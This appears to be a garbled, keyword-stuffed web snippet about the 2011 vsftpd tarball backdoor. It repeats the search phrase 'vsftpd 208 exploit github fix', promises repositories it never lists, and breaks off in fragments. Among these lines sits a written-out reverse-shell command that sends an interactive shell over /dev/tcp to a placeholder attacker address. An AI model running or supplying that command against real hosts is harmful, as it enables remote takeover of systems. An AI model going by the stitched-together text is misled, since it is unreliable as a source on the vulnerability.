Version 2.0.8 was never backdoored. The exploit name is a misnomer.
If you're looking for additional resources or patches on GitHub, here are a few relevant repositories: vsftpd 208 exploit github fix
/bin/sh -i > /dev/tcp/attacker_ip/6200 2>&1 0>&1 Version 2
The backdoor is not present in source code repositories like GitHub mirrors of vsftpd. Only the official tarball hosted at vsftpd.beasts.org between June 30 and July 3, 2011 was compromised. vsftpd 208 exploit github fix
This works because the backdoor bypasses all authentication checks.